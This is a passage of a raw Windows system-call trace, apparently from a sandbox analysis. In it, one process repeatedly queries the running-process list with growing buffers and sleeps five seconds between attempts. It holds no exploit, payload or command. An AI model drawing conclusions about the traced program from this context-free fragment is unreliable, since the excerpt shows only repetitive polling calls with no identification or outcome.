Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.606] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.621] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.641] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.641] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.641] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.644] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.653] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.686] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.715] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.716] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.734] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.749] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.762] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.783] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.806] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.814] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.815] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.818] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.821] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.824] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.840] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.854] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.857] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.871] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.887] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.938] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0131.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0131.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0131.949] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0131.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0131.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0131.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0131.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0132.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0132.002] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0132.002] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0132.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0132.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0132.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0132.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, 